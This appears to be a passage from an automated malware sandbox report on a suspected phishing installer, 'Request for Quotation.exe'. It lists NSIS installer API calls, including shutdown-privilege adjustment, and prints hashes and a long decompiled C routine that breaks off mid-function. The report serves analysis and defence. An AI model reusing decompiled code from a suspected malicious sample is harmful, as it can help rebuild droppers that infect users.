                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004035d7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004035a8
                                                                                0x004035a8
                                                                                0x004035a8
                                                                                0x004035a9
                                                                                0x004035a9
                                                                                0x00000000
                                                                                0x004035a8
                                                                                0x00000000

                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE ref: 004034AB
                                                                                • GetVersion.KERNEL32 ref: 004034B1
                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
                                                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
                                                                                • OleInitialize.OLE32(00000000), ref: 00403527
                                                                                • SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
                                                                                • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Request for Quotation.exe" ,00000020,"C:\Users\user\Desktop\Request for Quotation.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403594
                                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
                                                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
                                                                                • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7
                                                                                  • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                  • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                  • Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,73BCFA90), ref: 00403B50
                                                                                  • Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                  • Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                  • Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
                                                                                  • Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4
                                                                                  • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                                  • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002D0,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                                • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
                                                                                • ExitProcess.KERNEL32 ref: 004037C6
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403945
                                                                                • ExitProcess.KERNEL32 ref: 00403968
                                                                                  • Part of subcall function 00405969: MessageBoxIndirectA.USER32 ref: 004059C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                • String ID: "$"C:\Users\user\Desktop\Request for Quotation.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Request for Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                • API String ID: 538718688-3571868795
                                                                                • Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                • Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
                                                                                • Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                • Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E6F711A98() {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				CHAR* _v24;
                                                                                				CHAR* _v28;
                                                                                				signed int _v32;
                                                                                				signed int _v36;
                                                                                				signed int _v40;
                                                                                				signed int _v44;
                                                                                				CHAR* _v48;
                                                                                				signed int _v52;
                                                                                				void* _v56;
                                                                                				intOrPtr _v60;
                                                                                				CHAR* _t207;
                                                                                				signed int _t210;
                                                                                				void* _t212;
                                                                                				void* _t214;
                                                                                				CHAR* _t216;
                                                                                				void* _t224;
                                                                                				struct HINSTANCE__* _t225;
                                                                                				struct HINSTANCE__* _t226;
                                                                                				struct HINSTANCE__* _t228;
                                                                                				signed short _t230;
                                                                                				struct HINSTANCE__* _t233;
                                                                                				struct HINSTANCE__* _t235;
                                                                                				void* _t236;
                                                                                				char* _t237;
                                                                                				void* _t248;
                                                                                				signed char _t249;
                                                                                				signed int _t250;
                                                                                				void* _t254;
                                                                                				struct HINSTANCE__* _t256;
                                                                                				void* _t257;
                                                                                				signed int _t259;
                                                                                				intOrPtr _t260;
                                                                                				char* _t263;
                                                                                				signed int _t268;
                                                                                				signed int _t271;
                                                                                				signed int _t273;
                                                                                				void* _t276;
                                                                                				void* _t280;
                                                                                				struct HINSTANCE__* _t282;
                                                                                				intOrPtr _t285;
                                                                                				void _t286;
                                                                                				signed int _t287;
                                                                                				signed int _t299;
                                                                                				signed int _t300;
                                                                                				intOrPtr _t303;
                                                                                				void* _t304;
                                                                                				signed int _t308;
                                                                                				signed int _t311;
                                                                                				signed int _t314;
                                                                                				signed int _t315;
                                                                                				signed int _t316;
                                                                                				intOrPtr _t319;
                                                                                				intOrPtr* _t320;
                                                                                				CHAR* _t321;
                                                                                				CHAR* _t323;
                                                                                				CHAR* _t324;
                                                                                				struct HINSTANCE__* _t325;
                                                                                				void* _t327;
                                                                                				signed int _t328;
                                                                                				void* _t329;
                                                                                
                                                                                				_t282 = 0;
                                                                                				_v32 = 0;
                                                                                				_v36 = 0;
                                                                                				_v16 = 0;
                                                                                				_v8 = 0;
                                                                                				_v40 = 0;
                                                                                				_t329 = 0;
                                                                                				_v52 = 0;
                                                                                				_v44 = 0;
                                                                                				_t207 = E6F711215();
                                                                                				_v24 = _t207;
                                                                                				_v28 = _t207;
                                                                                				_v48 = E6F711215();
                                                                                				_t320 = E6F71123B();
                                                                                				_v56 = _t320;
                                                                                				_v12 = _t320;
                                                                                				while(1) {
                                                                                					_t210 = _v32;
                                                                                					_v60 = _t210;
                                                                                					if(_t210 != _t282 && _t329 == _t282) {
                                                                                						break;
                                                                                					}
                                                                                					_t319 =  *_t320;
                                                                                					_t285 = _t319;
                                                                                					_t212 = _t285 - _t282;
                                                                                					if(_t212 == 0) {
                                                                                						_t37 =  &_v32;
                                                                                						 *_t37 = _v32 | 0xffffffff;
                                                                                						__eflags =  *_t37;
                                                                                						L20:
                                                                                						_t214 = _v60 - _t282;
                                                                                						if(_t214 == 0) {
                                                                                							 *_v28 =  *_v28 & 0x00000000;
                                                                                							__eflags = _t329 - _t282;
                                                                                							if(_t329 == _t282) {
                                                                                								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
                                                                                								_t329 = _t254;
                                                                                								 *(_t329 + 0x810) = _t282;
                                                                                								 *(_t329 + 0x814) = _t282;
                                                                                							}
                                                                                							_t286 = _v36;
                                                                                							_t47 = _t329 + 8; // 0x8
                                                                                							_t216 = _t47;
                                                                                							_t48 = _t329 + 0x408; // 0x408
                                                                                							_t321 = _t48;
                                                                                							 *_t329 = _t286;
                                                                                							 *_t216 =  *_t216 & 0x00000000;
                                                                                							 *(_t329 + 0x808) = _t282;
                                                                                							 *_t321 =  *_t321 & 0x00000000;
                                                                                							_t287 = _t286 - _t282;
                                                                                							__eflags = _t287;
                                                                                							 *(_t329 + 0x80c) = _t282;
                                                                                							 *(_t329 + 4) = _t282;
                                                                                							if(_t287 == 0) {
                                                                                								__eflags = _v28 - _v24;
                                                                                								if(_v28 == _v24) {
                                                                                									goto L42;
                                                                                								}
                                                                                								_t327 = 0;
                                                                                								GlobalFree(_t329);
                                                                                								_t329 = E6F7112FE(_v24);
                                                                                								__eflags = _t329 - _t282;
                                                                                								if(_t329 == _t282) {
                                                                                									goto L42;
                                                                                								} else {
                                                                                									goto L35;
                                                                                								}
                                                                                								while(1) {
                                                                                									L35:
                                                                                									_t248 =  *(_t329 + 0x14a0);
                                                                                									__eflags = _t248 - _t282;
                                                                                									if(_t248 == _t282) {
                                                                                										break;
                                                                                									}
                                                                                									_t327 = _t329;
                                                                                									_t329 = _t248;
                                                                                									__eflags = _t329 - _t282;
                                                                                									if(_t329 != _t282) {
                                                                                										continue;
                                                                                									}
                                                                                									break;
                                                                                								}
                                                                                								__eflags = _t327 - _t282;
                                                                                								if(_t327 != _t282) {
                                                                                									 *(_t327 + 0x14a0) = _t282;
                                                                                								}
                                                                                								_t249 =  *(_t329 + 0x810);
                                                                                								__eflags = _t249 & 0x00000008;
                                                                                								if((_t249 & 0x00000008) == 0) {
                                                                                									_t250 = _t249 | 0x00000002;
                                                                                									__eflags = _t250;
                                                                                									 *(_t329 + 0x810) = _t250;
                                                                                								} else {
                                                                                									_t329 = E6F711534(_t329);
                                                                                									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
                                                                                								}
                                                                                								goto L42;
                                                                                							} else {
                                                                                								_t299 = _t287 - 1;
                                                                                								__eflags = _t299;
                                                                                								if(_t299 == 0) {
                                                                                									L31:
                                                                                									lstrcpyA(_t216, _v48);
                                                                                									L32:
                                                                                									lstrcpyA(_t321, _v24);
                                                                                									goto L42;
                                                                                								}
                                                                                								_t300 = _t299 - 1;
                                                                                								__eflags = _t300;
                                                                                								if(_t300 == 0) {
                                                                                									goto L32;
                                                                                								}
                                                                                								__eflags = _t300 != 1;
                                                                                								if(_t300 != 1) {
                                                                                									goto L42;
                                                                                								}
                                                                                								goto L31;
                                                                                							}
                                                                                						} else {
                                                                                							if(_t214 == 1) {
                                                                                								_t256 = _v16;
                                                                                								if(_v40 == _t282) {
                                                                                									_t256 = _t256 - 1;
                                                                                								}
                                                                                								 *(_t329 + 0x814) = _t256;
                                                                                							}
                                                                                							L42:
                                                                                							_v12 = _v12 + 1;
                                                                                							_v28 = _v24;
                                                                                							L59:
                                                                                							if(_v32 != 0xffffffff) {
                                                                                								_t320 = _v12;
                                                                                								continue;
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                					}
                                                                                					_t257 = _t212 - 0x23;
                                                                                					if(_t257 == 0) {
                                                                                						__eflags = _t320 - _v56;
                                                                                						if(_t320 <= _v56) {
                                                                                							L17:
                                                                                							__eflags = _v44 - _t282;
                                                                                							if(_v44 != _t282) {
                                                                                								L43:
                                                                                								_t259 = _v32 - _t282;
                                                                                								__eflags = _t259;
                                                                                								if(_t259 == 0) {
                                                                                									_t260 = _t319;
                                                                                									while(1) {
                                                                                										__eflags = _t260 - 0x22;
                                                                                										if(_t260 != 0x22) {
                                                                                											break;
                                                                                										}
                                                                                										_t320 = _t320 + 1;
                                                                                										__eflags = _v44 - _t282;
                                                                                										_v12 = _t320;
                                                                                										if(_v44 == _t282) {
                                                                                											_v44 = 1;
                                                                                											L162:
                                                                                											_v28 =  &(_v28[1]);
                                                                                											 *_v28 =  *_t320;
                                                                                											L58:
                                                                                											_t328 = _t320 + 1;
                                                                                											__eflags = _t328;
                                                                                											_v12 = _t328;
                                                                                											goto L59;
                                                                                										}
                                                                                										_t260 =  *_t320;
                                                                                										_v44 = _t282;
                                                                                									}
                                                                                									__eflags = _t260 - 0x2a;
                                                                                									if(_t260 == 0x2a) {
                                                                                										_v36 = 2;
                                                                                										L57:
                                                                                										_t320 = _v12;
                                                                                										_v28 = _v24;
                                                                                										_t282 = 0;
                                                                                										__eflags = 0;
                                                                                										goto L58;
                                                                                									}
                                                                                									__eflags = _t260 - 0x2d;
                                                                                									if(_t260 == 0x2d) {
                                                                                										L151:
                                                                                										_t303 =  *_t320;
                                                                                										__eflags = _t303 - 0x2d;
                                                                                										if(_t303 != 0x2d) {
                                                                                											L154:
                                                                                											_t263 = _t320 + 1;
                                                                                											__eflags =  *_t263 - 0x3a;
                                                                                											if( *_t263 != 0x3a) {
                                                                                												goto L162;
                                                                                											}
                                                                                											__eflags = _t303 - 0x2d;
                                                                                											if(_t303 == 0x2d) {
                                                                                												goto L162;
                                                                                											}
                                                                                											_v36 = 1;
                                                                                											L157:
                                                                                											_v12 = _t263;
                                                                                											__eflags = _v28 - _v24;
                                                                                											if(_v28 <= _v24) {
                                                                                												 *_v48 =  *_v48 & 0x00000000;
                                                                                											} else {
                                                                                												 *_v28 =  *_v28 & 0x00000000;
                                                                                												lstrcpyA(_v48, _v24);
                                                                                											}
                                                                                											goto L57;
                                                                                										}
                                                                                										_t263 = _t320 + 1;
                                                                                										__eflags =  *_t263 - 0x3e;
                                                                                										if( *_t263 != 0x3e) {
                                                                                											goto L154;
                                                                                										}
                                                                                										_v36 = 3;
                                                                                										goto L157;
                                                                                									}
                                                                                									__eflags = _t260 - 0x3a;
                                                                                									if(_t260 != 0x3a) {
                                                                                										goto L162;
                                                                                									}
                                                                                									goto L151;
                                                                                								}
                                                                                								_t268 = _t259 - 1;
                                                                                								__eflags = _t268;
                                                                                								if(_t268 == 0) {
                                                                                									L80:
                                                                                									_t304 = _t285 + 0xffffffde;
                                                                                									__eflags = _t304 - 0x55;
                                                                                									if(_t304 > 0x55) {
                                                                                										goto L57;
                                                                                									}
                                                                                									switch( *((intOrPtr*)(( *(_t304 + 0x6f712259) & 0x000000ff) * 4 +  &M6F7121CD))) {
                                                                                										case 0:
                                                                                											__eax = _v24;
                                                                                											__edi = _v12;
                                                                                											while(1) {
                                                                                												__edi = __edi + 1;
                                                                                												_v12 = __edi;
                                                                                												__cl =  *__edi;
                                                                                												__eflags = __cl - __dl;
                                                                                												if(__cl != __dl) {
                                                                                													goto L132;
                                                                                												}
                                                                                												L131:
                                                                                												__eflags =  *(__edi + 1) - __dl;
                                                                                												if( *(__edi + 1) != __dl) {
                                                                                													L136:
                                                                                													 *__eax =  *__eax & 0x00000000;
                                                                                													__eax = E6F711224(_v24);
                                                                                													__ebx = __eax;
                                                                                													goto L97;
                                                                                												}
                                                                                												L132:
                                                                                												__eflags = __cl;
                                                                                												if(__cl == 0) {
                                                                                													goto L136;
                                                                                												}
                                                                                												__eflags = __cl - __dl;
                                                                                												if(__cl == __dl) {
                                                                                													__edi = __edi + 1;
                                                                                													__eflags = __edi;
                                                                                												}
                                                                                												__cl =  *__edi;
                                                                                												 *__eax =  *__edi;
                                                                                												__eax = __eax + 1;
                                                                                												__edi = __edi + 1;
                                                                                												_v12 = __edi;
                                                                                												__cl =  *__edi;
                                                                                												__eflags = __cl - __dl;
                                                                                												if(__cl != __dl) {
                                                                                													goto L132;
                                                                                												}
                                                                                												goto L131;
                                                                                											}
                                                                                										case 1:
                                                                                											_v8 = 1;
                                                                                											goto L57;
                                                                                										case 2:
                                                                                											_v8 = _v8 | 0xffffffff;
                                                                                											goto L57;
                                                                                										case 3:
                                                                                											_v8 = _v8 & 0x00000000;
                                                                                											_v20 = _v20 & 0x00000000;
                                                                                											_v16 = _v16 + 1;
                                                                                											goto L85;
                                                                                										case 4:
                                                                                											__eflags = _v20;
                                                                                											if(_v20 != 0) {
                                                                                												goto L57;
                                                                                											}
                                                                                											_v12 = _v12 - 1;
                                                                                											__ebx = E6F711215();
                                                                                											 &_v12 = E6F711A36( &_v12);
                                                                                											__eax = E6F711429(__edx, __eax, __edx, __ebx);
                                                                                											goto L97;
                                                                                										case 5:
                                                                                											L105:
                                                                                											_v20 = _v20 + 1;
                                                                                											goto L57;
                                                                                										case 6:
                                                                                											_push(7);
                                                                                											goto L123;
                                                                                										case 7:
                                                                                											_push(0x19);
                                                                                											goto L143;
                                                                                										case 8:
                                                                                											__eax = 0;
                                                                                											__eax = 1;
                                                                                											__eflags = 1;
                                                                                											goto L107;
                                                                                										case 9:
                                                                                											_push(0x15);
                                                                                											goto L143;
                                                                                										case 0xa:
                                                                                											_push(0x16);
                                                                                											goto L143;
                                                                                										case 0xb:
                                                                                											_push(0x18);
                                                                                											goto L143;
                                                                                										case 0xc:
                                                                                											__eax = 0;
                                                                                											__eax = 1;
                                                                                											__eflags = 1;
                                                                                											goto L118;
                                                                                										case 0xd:
                                                                                											__eax = 0;
                                                                                											__eax = 1;
                                                                                											__eflags = 1;
                                                                                											goto L109;
                                                                                										case 0xe:
                                                                                											__eax = 0;
                                                                                											__eax = 1;
                                                                                											__eflags = 1;
                                                                                											goto L111;
                                                                                										case 0xf:
                                                                                											__eax = 0;
                                                                                											__eax = 1;
                                                                                											__eflags = 1;
                                                                                											goto L122;
                                                                                										case 0x10:
                                                                                											__eax = 0;
                                                                                											__eax = 1;
                                                                                											__eflags = 1;
                                                                                											goto L113;
                                                                                										case 0x11:
                                                                                											_push(3);
                                                                                											goto L123;
                                                                                										case 0x12:
                                                                                											_push(0x17);
                                                                                											L143:
                                                                                											_pop(__ebx);
                                                                                											goto L98;
                                                                                										case 0x13:
                                                                                											__eax =  &_v12;
                                                                                											__eax = E6F711A36( &_v12);
                                                                                											__ebx = __eax;
                                                                                											__ebx = __eax + 1;
                                                                                											__eflags = __ebx - 0xb;
                                                                                											if(__ebx < 0xb) {
                                                                                												__ebx = __ebx + 0xa;
                                                                                											}
                                                                                											goto L97;
                                                                                										case 0x14:
                                                                                											__ebx = 0xffffffff;
                                                                                											goto L98;
                                                                                										case 0x15:
                                                                                											__eax = 0;
                                                                                											__eflags = 0;
                                                                                											goto L116;
                                                                                										case 0x16:
                                                                                											__ecx = 0;
                                                                                											__eflags = 0;
                                                                                											goto L91;
                                                                                										case 0x17:
                                                                                											__eax = 0;
                                                                                											__eax = 1;
                                                                                											__eflags = 1;
                                                                                											goto L120;
                                                                                										case 0x18:
                                                                                											_t270 =  *(_t329 + 0x814);
                                                                                											__eflags = _t270 - _v16;
                                                                                											if(_t270 > _v16) {
                                                                                												_v16 = _t270;
                                                                                											}
                                                                                											_v8 = _v8 & 0x00000000;
                                                                                											_v20 = _v20 & 0x00000000;
                                                                                											_v36 - 3 = _t270 - (_v36 == 3);
                                                                                											if(_t270 != _v36 == 3) {
                                                                                												L85:
                                                                                												_v40 = 1;
                                                                                											}
                                                                                											goto L57;
                                                                                										case 0x19:
                                                                                											L107:
                                                                                											__ecx = 0;
                                                                                											_v8 = 2;
                                                                                											__ecx = 1;
                                                                                											goto L91;
                                                                                										case 0x1a:
                                                                                											L118:
                                                                                											_push(5);
                                                                                											goto L123;
                                                                                										case 0x1b:
                                                                                											L109:
                                                                                											__ecx = 0;
                                                                                											_v8 = 3;
                                                                                											__ecx = 1;
                                                                                											goto L91;
                                                                                										case 0x1c:
                                                                                											L111:
                                                                                											__ecx = 0;
                                                                                											__ecx = 1;
                                                                                											goto L91;
                                                                                										case 0x1d:
                                                                                											L122:
                                                                                											_push(6);
                                                                                											goto L123;
                                                                                										case 0x1e:
                                                                                											L113:
                                                                                											_push(2);
                                                                                											goto L123;
                                                                                										case 0x1f:
                                                                                											__eax =  &_v12;
                                                                                											__eax = E6F711A36( &_v12);
                                                                                											__ebx = __eax;
                                                                                											__ebx = __eax + 1;
                                                                                											goto L97;
                                                                                										case 0x20:
                                                                                											L116:
                                                                                											_v52 = _v52 + 1;
                                                                                											_push(3);
                                                                                											_pop(__ecx);
                                                                                											goto L91;
                                                                                										case 0x21:
                                                                                											L120:
                                                                                											_push(4);
                                                                                											L123:
                                                                                											_pop(__ecx);
                                                                                											L91:
                                                                                											__edi = _v16;
                                                                                											__edx =  *(0x6f71305c + __ecx * 4);
                                                                                											__eax =  ~__eax;
                                                                                											asm("sbb eax, eax");
                                                                                											_v40 = 1;
                                                                                											__edi = _v16 << 5;
                                                                                											__eax = __eax & 0x00008000;
                                                                                											__edi = (_v16 << 5) + __esi;
                                                                                											__eax = __eax | __ecx;
                                                                                											__eflags = _v8;
                                                                                											 *(__edi + 0x818) = __eax;
                                                                                											if(_v8 < 0) {
                                                                                												L93:
                                                                                												__edx = 0;
                                                                                												__edx = 1;
                                                                                												__eflags = 1;
                                                                                												L94:
                                                                                												__eflags = _v8 - 1;
                                                                                												 *(__edi + 0x828) = __edx;
                                                                                												if(_v8 == 1) {
                                                                                													__eax =  &_v12;
                                                                                													__eax = E6F711A36( &_v12);
                                                                                													__eax = __eax + 1;
                                                                                													__eflags = __eax;
                                                                                													_v8 = __eax;
                                                                                												}
                                                                                												__eax = _v8;
                                                                                												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
                                                                                												_t136 = _v16 + 0x41; // 0x41
                                                                                												_t136 = _t136 << 5;
                                                                                												__eax = 0;
                                                                                												__eflags = 0;
                                                                                												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                												 *((intOrPtr*)(__edi + 0x830)) = 0;
                                                                                												 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                                                                												L97:
                                                                                												__eflags = __ebx;
                                                                                												if(__ebx == 0) {
                                                                                													goto L57;
                                                                                												}
                                                                                												L98:
                                                                                												__eflags = _v20;
                                                                                												_v40 = 1;
                                                                                												if(_v20 != 0) {
                                                                                													L103:
                                                                                													__eflags = _v20 - 1;
                                                                                													if(_v20 == 1) {
                                                                                														__eax = _v16;
                                                                                														__eax = _v16 << 5;
                                                                                														__eflags = __eax;
                                                                                														 *(__eax + __esi + 0x82c) = __ebx;
                                                                                													}
                                                                                													goto L105;
                                                                                												}
                                                                                												_v16 = _v16 << 5;
                                                                                												_t144 = __esi + 0x830; // 0x830
                                                                                												__edi = (_v16 << 5) + _t144;
                                                                                												__eax =  *__edi;
                                                                                												__eflags = __eax - 0xffffffff;
                                                                                												if(__eax <= 0xffffffff) {
                                                                                													L101:
                                                                                													__eax = GlobalFree(__eax);
                                                                                													L102:
                                                                                													 *__edi = __ebx;
                                                                                													goto L103;
                                                                                												}
                                                                                												__eflags = __eax - 0x19;
                                                                                												if(__eax <= 0x19) {
                                                                                													goto L102;
                                                                                												}
                                                                                												goto L101;
                                                                                											}
                                                                                											__eflags = __edx;
                                                                                											if(__edx > 0) {
                                                                                												goto L94;
                                                                                											}
                                                                                											goto L93;
                                                                                										case 0x22:
                                                                                											goto L57;
                                                                                									}
                                                                                								}
                                                                                								_t271 = _t268 - 1;
                                                                                								__eflags = _t271;
                                                                                								if(_t271 == 0) {
                                                                                									_v16 = _t282;
                                                                                									goto L80;
                                                                                								}
                                                                                								__eflags = _t271 != 1;
                                                                                								if(_t271 != 1) {
                                                                                									goto L162;
                                                                                								}
                                                                                								__eflags = _t285 - 0x6e;
                                                                                								if(__eflags > 0) {
                                                                                									_t308 = _t285 - 0x72;
                                                                                									__eflags = _t308;
                                                                                									if(_t308 == 0) {
                                                                                										_push(4);
                                                                                										L74:
                                                                                										_pop(_t273);
                                                                                										L75:
                                                                                										__eflags = _v8 - 1;
                                                                                										if(_v8 != 1) {
                                                                                											_t96 = _t329 + 0x810;
                                                                                											 *_t96 =  *(_t329 + 0x810) &  !_t273;
                                                                                											__eflags =  *_t96;
                                                                                										} else {
                                                                                											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
                                                                                										}
                                                                                										_v8 = 1;
                                                                                										goto L57;
                                                                                									}
                                                                                									_t311 = _t308 - 1;
                                                                                									__eflags = _t311;
                                                                                									if(_t311 == 0) {
                                                                                										_push(0x10);
                                                                                										goto L74;
                                                                                									}
                                                                                									__eflags = _t311 != 0;
                                                                                									if(_t311 != 0) {
                                                                                										goto L57;
                                                                                									}
                                                                                									_push(0x40);
                                                                                									goto L74;
                                                                                								}
                                                                                								if(__eflags == 0) {
                                                                                									_push(8);
                                                                                									goto L74;
                                                                                								}
                                                                                								_t314 = _t285 - 0x21;
                                                                                								__eflags = _t314;
                                                                                								if(_t314 == 0) {
                                                                                									_v8 =  ~_v8;
                                                                                									goto L57;
                                                                                								}
                                                                                								_t315 = _t314 - 0x11;
                                                                                								__eflags = _t315;
                                                                                								if(_t315 == 0) {
                                                                                									_t273 = 0x100;
                                                                                									goto L75;
                                                                                								}
                                                                                								_t316 = _t315 - 0x31;
                                                                                								__eflags = _t316;
                                                                                								if(_t316 == 0) {
                                                                                									_t273 = 1;
                                                                                									goto L75;
                                                                                								}
                                                                                								__eflags = _t316 != 0;
                                                                                								if(_t316 != 0) {
                                                                                									goto L57;
                                                                                								}
                                                                                								_push(0x20);
                                                                                								goto L74;
                                                                                							} else {
                                                                                								_v32 = _t282;
                                                                                								_v36 = _t282;
                                                                                								goto L20;
                                                                                							}
                                                                                						}
                                                                                						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
                                                                                						if( *((char*)(_t320 - 1)) != 0x3a) {
                                                                                							goto L17;
                                                                                						}
                                                                                						__eflags = _v32 - _t282;
                                                                                						if(_v32 == _t282) {
                                                                                							goto L43;
                                                                                						}
                                                                                						goto L17;
                                                                                					}
                                                                                					_t276 = _t257 - 5;
                                                                                					if(_t276 == 0) {
                                                                                						__eflags = _v44 - _t282;
                                                                                						if(_v44 != _t282) {
                                                                                							goto L43;
                                                                                						} else {
                                                                                							__eflags = _v36 - 3;
                                                                                							_v32 = 1;
                                                                                							_v8 = _t282;
                                                                                							_v20 = _t282;
                                                                                							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                							_v40 = _t282;
                                                                                							goto L20;
                                                                                						}
                                                                                					}
                                                                                					_t280 = _t276 - 1;
                                                                                					if(_t280 == 0) {
                                                                                						__eflags = _v44 - _t282;
                                                                                						if(_v44 != _t282) {
                                                                                							goto L43;
                                                                                						} else {
                                                                                							_v32 = 2;
                                                                                							_v8 = _t282;
                                                                                							_v20 = _t282;
                                                                                							goto L20;
                                                                                						}
                                                                                					}
                                                                                					if(_t280 != 0x16) {
                                                                                						goto L43;
                                                                                					} else {
                                                                                						_v32 = 3;
                                                                                						_v8 = 1;
                                                                                						goto L20;
                                                                                					}
                                                                                				}
                                                                                				GlobalFree(_v56);
                                                                                				GlobalFree(_v24);
                                                                                				GlobalFree(_v48);
                                                                                				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
                                                                                					L182:
                                                                                					return _t329;
                                                                                				} else {
                                                                                					_t224 =  *_t329 - 1;
                                                                                					if(_t224 == 0) {
                                                                                						_t187 = _t329 + 8; // 0x8
                                                                                						_t323 = _t187;
                                                                                						__eflags =  *_t323;
                                                                                						if( *_t323 != 0) {
                                                                                							_t225 = GetModuleHandleA(_t323); // executed
                                                                                							__eflags = _t225 - _t282;
                                                                                							 *(_t329 + 0x808) = _t225;
                                                                                							if(_t225 != _t282) {
                                                                                								L171:
                                                                                								_t192 = _t329 + 0x408; // 0x408
                                                                                								_t324 = _t192;
                                                                                								_t226 = E6F7115C2( *(_t329 + 0x808), _t324);
                                                                                								__eflags = _t226 - _t282;
                                                                                								 *(_t329 + 0x80c) = _t226;
                                                                                								if(_t226 == _t282) {
                                                                                									__eflags =  *_t324 - 0x23;
                                                                                									if( *_t324 == 0x23) {
